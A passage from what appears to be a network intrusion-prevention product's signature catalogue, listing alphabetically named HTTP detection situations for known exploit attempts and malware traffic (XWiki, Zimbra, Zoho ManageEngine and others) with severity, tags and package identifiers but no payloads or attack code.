Tags: Any Operating System, Any Hardware, WSO2, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wwbn-Avideo-Chunkfile-Command-Injection

About this situation: An attempt to exploit a vulnerability in WWBN AVideo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WWBN AVideo, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Wwbn-Avideo-Chunkfile-Command-Injection
Description:
Back to top

HTTP_CRL-Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WWBN AVideo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WWBN AVideo, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wwbn-Avideo-Wget-Downloadurl-Command-Injection

About this situation: An attempt to exploit a vulnerability in WWBN AVideo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WWBN AVideo, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: Wwbn-Avideo-Wget-Downloadurl-Command-Injection
Description:
Back to top

HTTP_CRL-XCSSET-Malware-Traffic-2

About this situation: XCSSET malware traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Mac OS, Any Hardware, Mac OS not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: XCSSET-Malware-Traffic
Description:
Back to top

HTTP_CRL-Xorpix.bh-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.Xorpix.bh-Botnet
Description:
Back to top

HTTP_CRL-XpoLog-Center-Remote-Command-Execution

About this situation: A vulnerability in XpoLog Center
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XpoLog Center, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-798-5211
Vulnerability: XpoLog-Center-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Xwiki-Attachmentselector-Docname-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Vulnerability: Xwiki-Attachmentselector-Docname-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Deleteattachment-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1516-5242
Last changed: sgpkg-ips-1516-5242
Vulnerability: Xwiki-Deleteattachment-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Xwiki-Legacynotificationadministration-Since-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Vulnerability: Xwiki-Legacynotificationadministration-Since-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Mentionsmacro.XML-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1543-5242
Last changed: sgpkg-ips-1543-5242
Vulnerability: Xwiki-Mentionsmacro.XML-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection

About this situation: An attempt to exploit a vulnerability in XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Searchsuggestsourcesheet-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: Xwiki-Searchsuggestsourcesheet-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Solrsearchmacros-Text-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Xwiki-Solrsearchmacros-Text-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki-Xwikiserverclasssheet-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Vulnerability: Xwiki-Xwikiserverclasssheet-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Change-Request-Extension-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org Change Request extension detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Xwiki.org-Change-Request-Extension-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Databasesearch-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Vulnerability: Xwiki.org-Xwiki-Databasesearch-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Notificationrssservice-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Xwiki.org-Xwiki-Notificationrssservice-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Xwiki.org-Xwiki-Registrationconfig-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection-Suspected-Compromise

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Xwiki.org-Xwiki-Registrationconfig-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1612-5242
Vulnerability: Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Searchadmin-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Xwiki.org-Xwiki-Searchadmin-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Vulnerability: Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1573-5242
Vulnerability: Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection
Description:
Back to top

HTTP_CRL-Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Yealink-Device-Management-Command-Injection-CVE-2021-27561

About this situation: An attempt to exploit a vulnerability in Yealink Device Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Yealink, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Yealink-Device-Management-Command-Injection-CVE-2021-27561
Description:
Back to top

HTTP_CRL-YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Youngzsoft CMailServer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Youngzsoft CMailServer, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-166-2032
Last changed: sgpkg-ips-166-2032
Vulnerability: YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_CRL-YouPHPTube-Checkconfiguration.php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in YouPHPTube detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, YouPHPTube, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: YouPHPTube-Checkconfiguration.php-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in YouPHPTube Encoder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, YouPHPTube Encoder, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1205-5242
Vulnerability: YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection
Description:
Back to top

HTTP_CRL-YouPHPTube-SQL-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in YouPHPTube detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, YouPHPTube, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: YouPHPTube-SQL-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Ysoserial-Generated-DotNet-Serialized-Object

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Description:
Back to top

HTTP_CRL-Zabbix-Authenticated-Remote-Command-Execution

About this situation: Zabbix Authenticated Remote Command Execution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Zabbix-Authenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Zabbix-Geomap-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Zabbix-Geomap-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zen-Cart-Ajax.php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Zen Cart detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zen Cart, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Zen-Cart-Ajax.php-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-ZenTao-Pro-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ZenTao Pro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZenTao Pro, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: ZenTao-Pro-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Zeroboard-Dir-Parameter-Php-Code-Injection

About this situation: Zeroboard php code injection
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zeroboard, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Zeroboard-Dir-Parameter-Php-Code-Injection
Description:
Back to top

HTTP_CRL-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection

About this situation: Zeroboard print_category.php PHP code injection
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zeroboard, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection
Description:
Back to top

HTTP_CRL-ZeroShell-Command-Injection-CVE-2019-12725

About this situation: An attempt to exploit a vulnerability in ZeroShell detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZeroShell, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: ZeroShell-Command-Injection-CVE-2019-12725
Description:
Back to top

HTTP_CRL-Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection
Description:
Back to top

HTTP_CRL-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192
Description:
Back to top

HTTP_CRL-Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Vulnerability: Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537

About this situation: An attempt to exploit a vulnerability in ZK Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZK Framework, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1561-5242
Last changed: sgpkg-ips-1561-5242
Vulnerability: ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537
Description:
Back to top

HTTP_CRL-ZK-Framework-Potential-AuUploader-Authentication-Bypass-CVE-2022-36537

About this situation: An attempt to exploit a vulnerability in ZK Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZK Framework, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1561-5242
Last changed: sgpkg-ips-1561-5242
Vulnerability: ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537
Description: CVE References: CVE-2022-36537
Back to top

HTTP_CRL-Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADAudit Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADAudit Plus, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Vulnerability: Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADAudit Plus detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADAudit Plus, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADSelfService Plus detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADSelfService Plus, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADSelfService Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADSelfService Plus, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1603-5242
